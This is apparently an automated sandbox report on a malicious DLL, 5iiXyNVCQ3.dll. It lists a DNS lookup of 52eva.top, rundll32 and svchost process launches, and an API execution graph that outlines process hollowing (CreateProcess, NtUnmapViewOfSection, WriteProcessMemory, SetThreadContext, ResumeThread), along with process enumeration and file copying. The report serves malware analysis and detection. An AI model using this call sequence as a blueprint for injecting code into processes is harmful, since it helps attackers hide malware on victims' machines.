DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Nov 3, 2022 12:35:14.096695900 CET8.8.8.8192.168.2.40xdf81No error (0)52eva.top208.100.26.242A (IP address)IN (0x0001)false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:12:35:08
Start date:03/11/2022
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll"
Imagebase:0x1230000
File size:116736 bytes
MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Target ID:1
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c72c0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:2
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Imagebase:0xd90000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:3
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll
Imagebase:0x1120000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:4
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Imagebase:0x1120000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:5
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:6
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:7
Start time:12:35:12
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:10
Start time:12:35:15
Start date:03/11/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616
Imagebase:0xb50000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Target ID:12
Start time:12:35:17
Start date:03/11/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844
Imagebase:0xb50000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:19.6%
    Dynamic/Decrypted Code Coverage:1.5%
    Signature Coverage:37.2%
    Total number of Nodes:779
    Total number of Limit Nodes:19
    execution_graph 6216 10009200 6219 1000b390 GetModuleHandleA 6216->6219 6218 10009214 6218->6218 6220 1000b40b 6219->6220 6221 1000b3ae LoadLibraryA 6219->6221 6223 1000b427 strchr 6220->6223 6224 1000b417 atoi 6220->6224 6222 1000b3bb wsprintfA MessageBoxA 6221->6222 6226 1000b3e8 6221->6226 6225 10009390 ExitProcess 6222->6225 6228 1000b45f 6223->6228 6227 1000b46f GetProcAddress 6224->6227 6225->6226 6226->6220 6229 1000b4c6 6227->6229 6230 1000b47d wsprintfA MessageBoxA 6227->6230 6228->6227 6229->6218 6231 10009390 ExitProcess 6230->6231 6232 1000b4ab 6231->6232 6232->6218 6233 1000ae00 6234 1000b1f2 6233->6234 6235 1000ae19 6233->6235 6236 1000b2e8 wsprintfA MessageBoxA 6234->6236 6238 1000b244 6234->6238 6239 1000b225 6234->6239 6240 1000b2b7 6234->6240 6241 1000b208 6234->6241 6242 1000b269 wsprintfA MessageBoxA 6234->6242 6276 1000aec0 6234->6276 6237 1000ae1f 6235->6237 6264 1000b13b 6235->6264 6236->6276 6243 1000b034 6237->6243 6244 1000ae2a 6237->6244 6298 10009480 6238->6298 6252 100094c0 3 API calls 6239->6252 6246 10009390 ExitProcess 6240->6246 6249 10009430 4 API calls 6241->6249 6245 10009390 ExitProcess 6242->6245 6247 1000b042 6243->6247 6248 1000b0fd GetModuleFileNameA 6243->6248 6250 1000ae30 6244->6250 6251 1000aff4 GetCommandLineA 6244->6251 6263 1000b2a5 6245->6263 6265 1000b2c4 6246->6265 6255 1000b0c3 GetModuleFileNameA 6247->6255 6256 1000b045 6247->6256 6262 1000b117 strrchr 6248->6262 6248->6276 6257 1000b215 6249->6257 6258 1000af95 6250->6258 6259 1000ae3b 6250->6259 6251->6276 6260 1000b232 6252->6260 6270 1000b0dd strrchr 6255->6270 6255->6276 6256->6236 6267 1000b04e PeekMessageA 6256->6267 6258->6236 6271 1000afa0 6258->6271 6268 1000ae72 GetModuleFileNameA 6259->6268 6269 1000ae3d 6259->6269 6261 1000b259 6264->6236 6264->6238 6264->6239 6264->6240 6264->6241 6264->6242 6272 1000b18c 6264->6272 6264->6276 6277 1000b16d 6264->6277 6273 1000b06b 6267->6273 6267->6276 6275 1000ae88 strrchr 6268->6275 6268->6276 6269->6236 6274 1000ae4e 6269->6274 6271->6276 6278 1000afe0 _ftol 6271->6278 6279 1000afc0 6271->6279 6272->6276 6291 100094c0 6272->6291 6273->6276 6280 1000b088 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6273->6280 6275->6276 6285 1000be80 6277->6285 6279->6276 6282 1000afcc _ftol 6279->6282 6280->6273 6283 1000b0b6 6280->6283 6287 1000be9b 6285->6287 6286 1000becb 6288 100094c0 3 API calls 6286->6288 6287->6286 6289 100094c0 3 API calls 6287->6289 6290 1000b17a 6288->6290 6289->6287 6292 10009506 6291->6292 6293 100094cd 6291->6293 6294 100094db 6293->6294 6295 10009360 GetModuleHandleA 6293->6295 6294->6292 6296 100094eb IsBadHugeReadPtr 6294->6296 6295->6294 6296->6292 6297 100094f8 HeapFree 6296->6297 6297->6292 6299 10009494 6298->6299 6300 10009489 GetProcessHeap 6298->6300 6301 100094ac RtlAllocateHeap 6299->6301 6302 1000949c RtlReAllocateHeap 6299->6302 6300->6299 6301->6261 6302->6261 6303 10004606 6304 10004633 6303->6304 6356 10005d6f GetEnvironmentVariableA 6304->6356 6306 1000464d 6307 10004786 CreateProcessA 6306->6307 6308 1000487e 6307->6308 6309 100049a4 GetThreadContext 6308->6309 6332 1000496f 6308->6332 6310 10004b18 6309->6310 6311 10009520 5 API calls 6310->6311 6312 10004bcb 6311->6312 6313 10004ccd 6312->6313 6314 10004cdf 6312->6314 6360 10005e5f 6313->6360 6316 10004d24 ReadProcessMemory 6314->6316 6317 10004d39 6316->6317 6318 10004d50 6317->6318 6319 10004d62 NtUnmapViewOfSection 6317->6319 6320 10005e5f 2 API calls 6318->6320 6321 10004d85 6319->6321 6320->6332 6322 10004db1 VirtualAllocEx 6321->6322 6323 10004d9f 6321->6323 6325 10004dfc 6322->6325 6324 10005e5f 2 API calls 6323->6324 6324->6332 6326 10004e16 6325->6326 6329 10004e28 6325->6329 6327 10005e5f 2 API calls 6326->6327 6327->6332 6328 10004e50 WriteProcessMemory 6330 10004e8f 6328->6330 6329->6328 6330->6330 6331 10005084 LocalSize 6330->6331 6354 1000509b 6331->6354 6333 100057c5 6334 1000580d WriteProcessMemory 6333->6334 6335 10005822 6334->6335 6336 10005884 SetThreadContext 6335->6336 6337 100059f8 6336->6337 6339 10009520 5 API calls 6337->6339 6338 10005369 LocalSize 6338->6354 6340 10005aab 6339->6340 6341 10005b9c ResumeThread 6340->6341 6342 10005bc2 6341->6342 6343 10005bd9 WaitForSingleObject 6342->6343 6344 10005bfd 6342->6344 6343->6344 6344->6332 6345 10005c14 CloseHandle 6344->6345 6347 10005c43 CloseHandle 6345->6347 6348 10005c36 6345->6348 6346 100054d0 RtlMoveMemory 6346->6354 6347->6332 6348->6347 6349 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6349->6354 6351 10005660 6352 10005e5f 2 API calls 6351->6352 6352->6332 6353 1000571b WriteProcessMemory 6353->6354 6354->6333 6354->6338 6354->6346 6354->6349 6354->6351 6354->6353 6355 1000579b VirtualProtectEx 6354->6355 6366 10005f47 6354->6366 6355->6354 6358 10005da7 6356->6358 6357 10005dfb GetEnvironmentVariableA 6359 10005e1b 6357->6359 6358->6357 6359->6306 6361 10005e83 6360->6361 6362 10005e99 CloseHandle 6361->6362 6363 10005ec8 CloseHandle 6362->6363 6364 10005ebb 6362->6364 6365 10005ee7 6363->6365 6364->6363 6365->6332 6367 10005f69 6366->6367 6368 10005fcc lstrcpyn 6367->6368 6371 10005fa1 6367->6371 6369 10005fdc 6368->6369 6370 1000600e RtlMoveMemory 6369->6370 6370->6371 6371->6354 6372 10008e08 6375 10007548 6372->6375 6378 1000754b 6375->6378 6381 1000757e 6378->6381 6394 10007779 6378->6394 6417 10007ffc 6378->6417 6434 1000a7a0 Sleep 6378->6434 6435 100024e3 6381->6435 6383 1000759f 6441 1000a7b0 6383->6441 6385 100075e7 6386 100024e3 4 API calls 6385->6386 6387 10007744 6385->6387 6388 1000763f 6386->6388 6387->6378 6459 1000a760 PathFileExistsA 6388->6459 6390 100076b3 6390->6387 6460 1000300a 6390->6460 6392 10007715 6468 10009710 SetFileAttributesA 6392->6468 6395 100024e3 4 API calls 6394->6395 6396 100077d9 6395->6396 6484 10009660 6396->6484 6398 100078ea 6399 100024e3 4 API calls 6398->6399 6400 10007919 6399->6400 6401 100024e3 4 API calls 6400->6401 6402 10007955 6401->6402 6403 100024e3 4 API calls 6402->6403 6404 10007991 6403->6404 6405 100024e3 4 API calls 6404->6405 6415 100079cd 6405->6415 6406 100079f8 RegEnumKeyA 6406->6415 6407 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6407->6415 6408 10007e76 6408->6378 6409 1000a7b0 15 API calls 6409->6415 6411 10009d80 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6411->6415 6414 1000300a 3 API calls 6414->6415 6415->6406 6415->6407 6415->6408 6415->6409 6415->6411 6415->6414 6489 1000a950 6415->6489 6511 1000a6f0 6415->6511 6516 1000a760 PathFileExistsA 6415->6516 6517 10009710 SetFileAttributesA 6415->6517 6418 10008016 6417->6418 6419 10008037 CreateToolhelp32Snapshot 6418->6419 6420 100080a5 6419->6420 6421 10009520 5 API calls 6420->6421 6425 100080bf 6420->6425 6422 100081f5 6421->6422 6423 100024e3 4 API calls 6422->6423 6432 1000824f 6423->6432 6424 100086dd CloseHandle 6424->6425 6425->6378 6428 10009520 5 API calls 6428->6432 6431 1000300a 3 API calls 6431->6432 6432->6424 6432->6428 6432->6431 6570 1000a370 6432->6570 6597 10008779 6432->6597 6617 10009d80 6432->6617 6622 1000a760 PathFileExistsA 6432->6622 6623 10009710 SetFileAttributesA 6432->6623 6434->6378 6436 10002528 6435->6436 6469 100097e0 6436->6469 6438 1000261c 6439 10002768 6438->6439 6474 10009830 6438->6474 6439->6383 6442 1000a7c1 6441->6442 6443 1000a8fe 6442->6443 6445 1000a7ec ??2@YAPAXI strrchr 6442->6445 6444 1000a93a 6443->6444 6448 1000b990 4 API calls 6443->6448 6444->6385 6446 1000a825 6445->6446 6447 1000a829 RegOpenKeyA 6445->6447 6446->6447 6449 1000a8ed ??3@YAXPAX 6447->6449 6450 1000a83e ??2@YAPAXI RegQueryValueExA 6447->6450 6452 1000a923 6448->6452 6449->6443 6451 1000a92e 6449->6451 6453 1000a8b1 6450->6453 6454 1000a87c 6450->6454 6451->6385 6452->6385 6456 1000a8d9 ??3@YAXPAX RegCloseKey 6453->6456 6457 1000b990 4 API calls 6453->6457 6455 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6454->6455 6454->6456 6455->6453 6455->6454 6456->6449 6458 1000a8d2 6457->6458 6458->6456 6459->6390 6461 10003024 6460->6461 6462 1000304a CreateFileA 6461->6462 6463 1000309c 6462->6463 6464 1000324a WriteFile 6463->6464 6465 1000326a FindCloseChangeNotification 6464->6465 6466 1000325d 6464->6466 6467 1000327f 6465->6467 6466->6465 6467->6392 6468->6387 6470 1000982b 6469->6470 6471 100097ea 6469->6471 6470->6438 6471->6470 6479 1000b500 6471->6479 6473 10009825 6473->6438 6475 10009839 6474->6475 6476 1000983d 6474->6476 6475->6438 6477 10009430 4 API calls 6476->6477 6478 10009844 6477->6478 6478->6438 6480 1000b509 6479->6480 6481 1000b50d 6479->6481 6480->6473 6482 10009430 4 API calls 6481->6482 6483 1000b517 6482->6483 6483->6473 6485 10009669 6484->6485 6486 1000966d 6484->6486 6485->6398 6487 10009430 4 API calls 6486->6487 6488 10009678 6487->6488 6488->6398 6490 1000a981 6489->6490 6493 1000a989 6489->6493 6490->6415 6491 1000ab52 6528 1000b9d0 6491->6528 6493->6491 6495 1000aa0d 6493->6495 6494 1000ab58 6494->6415 6496 1000aa93 6495->6496 6499 1000aa30 6495->6499 6497 1000aa97 _strnicmp 6496->6497 6501 1000b810 8 API calls 6496->6501 6504 1000aa91 6496->6504 6497->6496 6498 1000aa38 _strncoll 6498->6499 6499->6498 6503 1000b810 8 API calls 6499->6503 6499->6504 6500 1000ab12 6502 1000b990 4 API calls 6500->6502 6501->6496 6505 1000ab29 6502->6505 6503->6499 6504->6500 6518 1000b810 6504->6518 6525 1000b740 6505->6525 6509 1000b740 2 API calls 6510 1000ab48 6509->6510 6510->6415 6512 1000a751 6511->6512 6513 1000a705 6511->6513 6512->6415 6513->6512 6514 10009430 4 API calls 6513->6514 6515 1000a728 6514->6515 6515->6415 6516->6415 6517->6415 6519 1000b82a 6518->6519 6520 1000b81a 6518->6520 6519->6500 6533 1000b630 6520->6533 6522 1000b826 6522->6519 6550 1000b870 6522->6550 6524 1000b841 6524->6500 6526 1000b760 2 API calls 6525->6526 6527 1000ab37 6526->6527 6527->6509 6529 1000ba14 6528->6529 6530 1000b9d9 6528->6530 6529->6494 6530->6529 6531 10009430 4 API calls 6530->6531 6532 1000b9f7 6531->6532 6532->6494 6534 1000b64a 6533->6534 6535 1000b63d 6533->6535 6537 1000b651 6534->6537 6541 1000b65f 6534->6541 6536 1000b740 2 API calls 6535->6536 6538 1000b642 6536->6538 6555 1000b560 6537->6555 6538->6522 6540 1000b659 6540->6522 6542 1000b692 6541->6542 6543 1000b6a4 GetProcessHeap 6541->6543 6544 1000b6af 6541->6544 6542->6522 6543->6544 6545 1000b712 RtlReAllocateHeap 6544->6545 6546 1000b6b4 RtlAllocateHeap 6544->6546 6545->6538 6546->6538 6547 1000b6d0 6546->6547 6564 1000b760 6547->6564 6549 1000b6f8 6549->6522 6551 1000b8c3 6550->6551 6552 1000b878 6550->6552 6551->6524 6553 1000b87d 6552->6553 6554 1000b8b0 memmove 6552->6554 6553->6524 6554->6551 6556 1000b56c 6555->6556 6561 1000b57c 6555->6561 6557 1000b630 5 API calls 6556->6557 6558 1000b576 6557->6558 6558->6540 6559 1000b5fa RtlAllocateHeap 6562 1000b611 6559->6562 6560 1000b5ef GetProcessHeap 6560->6559 6561->6559 6561->6560 6563 1000b584 6561->6563 6562->6540 6563->6540 6565 1000b7be 6564->6565 6566 1000b76a 6564->6566 6565->6549 6567 1000b7b4 HeapFree 6566->6567 6568 1000b7a9 GetProcessHeap 6566->6568 6569 1000b77e 6566->6569 6567->6565 6568->6567 6569->6549 6571 1000a3f8 6570->6571 6572 1000a38f 6570->6572 6573 1000a403 6571->6573 6574 1000a4f4 6571->6574 6596 1000a5f4 6572->6596 6624 1000a300 6572->6624 6575 1000a409 6573->6575 6576 1000a4cf sprintf 6573->6576 6577 1000a572 6574->6577 6578 1000a4fb 6574->6578 6585 1000a497 6575->6585 6586 1000a479 6575->6586 6587 1000a41e 6575->6587 6588 1000a50f sprintf 6575->6588 6575->6596 6576->6587 6581 1000a579 6577->6581 6582 1000a5aa sprintf 6577->6582 6579 1000a4fd 6578->6579 6580 1000a54e sprintf 6578->6580 6589 1000a504 6579->6589 6590 1000a52e sprintf 6579->6590 6580->6587 6583 1000a584 sprintf 6581->6583 6581->6596 6582->6587 6583->6587 6629 1000bc30 modf 6585->6629 6591 1000a300 4 API calls 6586->6591 6595 10009430 4 API calls 6587->6595 6587->6596 6588->6587 6589->6588 6589->6596 6590->6587 6594 1000a488 6591->6594 6593 1000a3e9 6593->6432 6594->6432 6595->6596 6596->6432 6598 10008793 6597->6598 6599 100087c5 OpenProcess 6598->6599 6601 10008805 6599->6601 6643 10009bf0 6601->6643 6602 1000886b 6648 1000ac70 6602->6648 6604 10008922 6605 1000ac70 6 API calls 6604->6605 6609 10008a22 6605->6609 6606 10008a91 VirtualQueryEx 6607 10008ab4 6606->6607 6608 10009bf0 4 API calls 6607->6608 6610 10008b1c 6608->6610 6609->6606 6654 10008c8b 6610->6654 6612 10008b82 6662 1000a640 6612->6662 6614 10008bde 6615 10009d80 4 API calls 6614->6615 6616 10008c0c 6615->6616 6616->6432 6618 10009d97 6617->6618 6619 10009dcb 6617->6619 6618->6619 6620 10009430 4 API calls 6618->6620 6619->6432 6621 10009dae 6620->6621 6621->6432 6622->6432 6623->6432 6626 1000a311 6624->6626 6625 1000a31e 6625->6593 6626->6625 6627 10009430 4 API calls 6626->6627 6628 1000a34a 6627->6628 6628->6593 6635 1000c220 _ftol 6629->6635 6631 1000bc73 6636 1000c0a0 6631->6636 6634 1000bc91 sprintf 6634->6587 6635->6631 6637 1000c1f5 _ftol 6636->6637 6638 1000c0b9 6636->6638 6637->6634 6638->6637 6639 1000c0ca 6638->6639 6640 1000c0e0 _ftol 6639->6640 6641 1000c0f3 _ftol 6639->6641 6642 1000c104 6640->6642 6641->6642 6642->6634 6644 10009bf9 6643->6644 6645 10009bfd 6643->6645 6644->6602 6646 10009430 4 API calls 6645->6646 6647 10009c06 6646->6647 6647->6602 6649 1000ac80 6648->6649 6651 1000ac8c 6649->6651 6670 100093d0 6649->6670 6653 1000ad16 6651->6653 6675 1000ab70 6651->6675 6653->6604 6684 100095a0 6654->6684 6657 10008cfe 6658 10009660 4 API calls 6657->6658 6659 10008d27 6658->6659 6660 10008d88 WideCharToMultiByte 6659->6660 6661 10008dc2 6660->6661 6661->6612 6663 1000a66a 6662->6663 6669 1000a6b3 6662->6669 6667 1000a69b 6663->6667 6668 1000a6bb 6663->6668 6663->6669 6664 1000a69f _strnicmp 6666 1000a6db 6664->6666 6664->6667 6665 1000a6bf _strncoll 6665->6666 6665->6668 6666->6614 6667->6664 6667->6669 6668->6665 6668->6669 6669->6614 6671 100093ec wsprintfA MessageBoxA 6670->6671 6673 100093e0 6670->6673 6672 10009390 ExitProcess 6671->6672 6674 1000941c 6672->6674 6673->6671 6674->6651 6676 1000ab83 6675->6676 6678 1000ab9a 6675->6678 6677 1000abe7 6676->6677 6676->6678 6681 1000abba 6676->6681 6679 1000b500 4 API calls 6677->6679 6678->6653 6680 1000abf6 6679->6680 6680->6653 6682 1000b990 4 API calls 6681->6682 6683 1000abde 6682->6683 6683->6653 6685 10008cc0 WideCharToMultiByte 6684->6685 6685->6657 6087 1000b390 GetModuleHandleA 6088 1000b40b 6087->6088 6089 1000b3ae LoadLibraryA 6087->6089 6091 1000b427 strchr 6088->6091 6092 1000b417 atoi 6088->6092 6090 1000b3bb wsprintfA MessageBoxA 6089->6090 6094 1000b3e8 6089->6094 6093 10009390 ExitProcess 6090->6093 6096 1000b45f 6091->6096 6095 1000b46f GetProcAddress 6092->6095 6093->6094 6094->6088 6097 1000b4c6 6095->6097 6098 1000b47d wsprintfA MessageBoxA 6095->6098 6096->6095 6101 10009390 6098->6101 6102 10009398 6101->6102 6103 100093a1 ExitProcess 6102->6103 6104 100093ad 6102->6104 6745 10009a10 6746 10009a18 6745->6746 6747 10009a28 6746->6747 6748 10009a1f ??3@YAXPAX 6746->6748 6748->6747 6808 10009320 GetProcessHeap 6809 100095e0 6808->6809 7182 10008fae 7183 1000b390 10 API calls 7182->7183 7184 10008fc2 7183->7184 7184->7184 6105 1000a7b0 6106 1000a7c1 6105->6106 6107 1000a8fe 6106->6107 6109 1000a7ec ??2@YAPAXI strrchr 6106->6109 6108 1000a93a 6107->6108 6112 1000b990 4 API calls 6107->6112 6110 1000a825 6109->6110 6111 1000a829 RegOpenKeyA 6109->6111 6110->6111 6113 1000a8ed ??3@YAXPAX 6111->6113 6114 1000a83e ??2@YAPAXI RegQueryValueExA 6111->6114 6116 1000a923 6112->6116 6113->6107 6115 1000a92e 6113->6115 6117 1000a8b1 6114->6117 6118 1000a87c 6114->6118 6120 1000a8d9 ??3@YAXPAX RegCloseKey 6117->6120 6123 1000b990 6117->6123 6119 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6118->6119 6118->6120 6119->6117 6119->6118 6120->6113 6122 1000a8d2 6122->6120 6124 1000b999 6123->6124 6125 1000b99d 6123->6125 6124->6122 6128 10009430 6125->6128 6129 10009444 RtlAllocateHeap 6128->6129 6130 10009439 GetProcessHeap 6128->6130 6131 10009472 6129->6131 6132 10009459 MessageBoxA 6129->6132 6130->6129 6131->6122 6133 10009390 ExitProcess 6132->6133 6133->6131 6928 1000753c 6931 100061d0 6928->6931 6932 100024e3 4 API calls 6931->6932 6934 100061ea 6932->6934 6933 1000621a EnumWindows 6933->6934 6935 1000751d 6933->6935 6934->6933 6938 10006272 6935->6938 6937 10007536 6939 1000629a 6938->6939 6962 100065cf 6939->6962 6941 100062b3 6942 100024e3 4 API calls 6941->6942 6943 100062df 6942->6943 6944 10006329 GetWindowThreadProcessId 6943->6944 6950 10006564 6943->6950 6945 1000634f GetCurrentProcessId 6944->6945 6946 10006342 6944->6946 6947 10006361 6945->6947 6946->6945 6947->6950 6967 1000667b 6947->6967 6949 1000637f 6973 10009850 6949->6973 6950->6937 6952 100063cf 6952->6950 6953 100024e3 4 API calls 6952->6953 6954 1000646e 6953->6954 6986 10009a40 6954->6986 6956 100064cc 6956->6950 6994 10009b10 6956->6994 6958 10006537 6999 1000676c 6958->6999 6960 1000655f 7015 1000728d 6960->7015 6963 10009660 4 API calls 6962->6963 6965 100065fa 6963->6965 6964 10006614 GetClassNameA 6966 10006635 6964->6966 6965->6964 6966->6941 6968 1000669e 6967->6968 6969 10009660 4 API calls 6968->6969 6970 100066ed 6969->6970 6971 10006707 GetWindowTextA 6970->6971 6972 10006726 6971->6972 6972->6949 6974 1000985b 6973->6974 6975 1000997a 6974->6975 6978 100098e2 6974->6978 6983 1000b990 4 API calls 6974->6983 7030 1000b7d0 6974->7030 6976 10009430 4 API calls 6975->6976 6977 1000998d 6976->6977 6979 1000b740 2 API calls 6977->6979 6978->6975 6981 1000b9d0 4 API calls 6978->6981 6980 100099d4 6979->6980 6980->6952 6982 1000996d 6981->6982 6984 1000b7d0 8 API calls 6982->6984 6983->6974 6984->6975 6987 10009a68 6986->6987 6993 10009ac3 6986->6993 6991 10009a9d 6987->6991 6992 10009acb 6987->6992 6987->6993 6988 10009aa1 _strnicmp 6990 10009af9 6988->6990 6988->6991 6989 10009acf _strncoll 6989->6990 6989->6992 6990->6956 6991->6988 6991->6993 6992->6989 6992->6993 6993->6956 7035 1000ba20 6994->7035 6996 10009b31 6997 10009b3a 6996->6997 6998 100094c0 3 API calls 6996->6998 6997->6958 6998->6997 7001 10006775 6999->7001 7002 100067ba 7001->7002 7043 100068f2 VirtualProtect 7001->7043 7006 1000680c 7002->7006 7045 10006984 7002->7045 7004 100024e3 4 API calls 7005 1000683d 7004->7005 7050 10006af4 7005->7050 7006->7004 7008 1000686a 7009 100068f2 VirtualProtect 7008->7009 7010 1000689a 7009->7010 7011 100068f2 VirtualProtect 7010->7011 7012 100068aa 7011->7012 7062 10009ba0 7012->7062 7014 100068cb 7014->6960 7111 10002d31 7015->7111 7017 100072a7 7018 1000a640 2 API calls 7017->7018 7019 10007315 7018->7019 7020 1000a6f0 4 API calls 7019->7020 7021 10007365 7020->7021 7022 10009b10 8 API calls 7021->7022 7023 100073a8 7022->7023 7119 1000a760 PathFileExistsA 7023->7119 7025 10007412 7026 10007479 7025->7026 7120 1000a770 DeleteFileA 7025->7120 7121 1000a780 CopyFileA 7026->7121 7029 100074e9 7029->6950 7031 1000b7f5 7030->7031 7032 1000b7dd 7030->7032 7033 1000b810 8 API calls 7031->7033 7032->6974 7034 1000b801 7033->7034 7034->6974 7036 1000ba37 7035->7036 7040 1000ba3b 7035->7040 7036->6996 7037 1000ba6d 7039 1000ba7b 7037->7039 7041 10009430 4 API calls 7037->7041 7038 1000ba46 _strncoll 7038->7037 7038->7040 7039->6996 7040->7037 7040->7038 7042 1000ba86 7041->7042 7042->6996 7044 1000692d 7043->7044 7044->7001 7046 100069ab VirtualProtect 7045->7046 7049 100069a1 7045->7049 7047 100069d4 7046->7047 7048 10009bf0 4 API calls 7047->7048 7048->7049 7049->7006 7051 10006b38 7050->7051 7067 10009c20 7051->7067 7053 10006bf9 7078 10009d50 7053->7078 7055 10009d80 4 API calls 7056 10006c6f 7055->7056 7056->7055 7057 10006c97 7056->7057 7060 10009de0 25 API calls 7056->7060 7061 1000a030 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7056->7061 7082 1000703e 7056->7082 7090 1000a110 7056->7090 7057->7008 7060->7056 7061->7056 7063 10009bb4 7062->7063 7064 10009bb7 7062->7064 7063->7014 7065 10009430 4 API calls 7064->7065 7066 10009bbe 7065->7066 7066->7014 7068 10009c43 7067->7068 7069 10009c3d 7067->7069 7070 10009430 4 API calls 7068->7070 7069->7053 7072 10009c4d 7070->7072 7071 10009c6a _strncoll 7071->7072 7072->7071 7075 10009c9b _strncoll 7072->7075 7076 10009cca strncpy 7072->7076 7077 10009cee 7072->7077 7073 100094c0 3 API calls 7074 10009d0f 7073->7074 7074->7053 7075->7072 7076->7072 7077->7073 7077->7074 7079 10009d5b 7078->7079 7081 10009d76 7078->7081 7080 10009d63 _CIfmod 7079->7080 7080->7080 7080->7081 7081->7056 7083 10007072 7082->7083 7084 10007215 7083->7084 7088 10009a40 2 API calls 7083->7088 7105 1000a270 7083->7105 7110 1000a2e0 _CIpow 7083->7110 7086 1000a370 16 API calls 7084->7086 7087 1000724b 7084->7087 7086->7087 7087->7056 7088->7083 7091 1000a128 7090->7091 7092 1000a15d 7090->7092 7093 1000a130 7091->7093 7098 1000b990 4 API calls 7091->7098 7094 1000a253 7092->7094 7095 1000a175 7092->7095 7093->7056 7096 1000b990 4 API calls 7094->7096 7100 10009430 4 API calls 7095->7100 7097 1000a25a 7096->7097 7097->7056 7099 1000a155 7098->7099 7099->7056 7101 1000a1b9 7100->7101 7102 1000a1c3 strncpy 7101->7102 7103 1000a1dd strncpy 7101->7103 7104 1000a1d9 7102->7104 7103->7104 7104->7056 7106 1000a2d1 7105->7106 7107 1000a286 7105->7107 7106->7083 7107->7106 7108 10009430 4 API calls 7107->7108 7109 1000a2af 7108->7109 7109->7083 7110->7083 7112 10008f42 7111->7112 7113 10002d44 PathIsDirectoryA 7112->7113 7114 10002d81 7113->7114 7115 10009850 12 API calls 7114->7115 7116 10002d96 7114->7116 7117 10002dd7 7115->7117 7116->7017 7117->7116 7118 10002f3c PathIsDirectoryA 7117->7118 7118->7117 7119->7025 7120->7026 7121->7029 7122 1000c440 7123 1000c467 7122->7123 7124 1000c4db 7122->7124 7123->7124 7132 1000c46c SHGetSpecialFolderPathA 7123->7132 7125 1000c4e0 GetWindowsDirectoryA 7124->7125 7126 1000c4f2 7124->7126 7131 1000c4d9 7125->7131 7127 1000c4f7 GetSystemDirectoryA 7126->7127 7128 1000c509 7126->7128 7127->7131 7130 1000c50e GetTempPathA 7128->7130 7128->7131 7130->7131 7132->7131 6202 1008354a 6204 10083555 6202->6204 6205 10083569 6204->6205 6206 1008357b VirtualAlloc 6204->6206 6205->6206 6209 100837bd 6205->6209 6207 100835b7 6206->6207 6206->6209 6210 100835c2 6207->6210 6211 100835d1 6210->6211 6212 10083632 VirtualFree 6211->6212 6214 1008365a 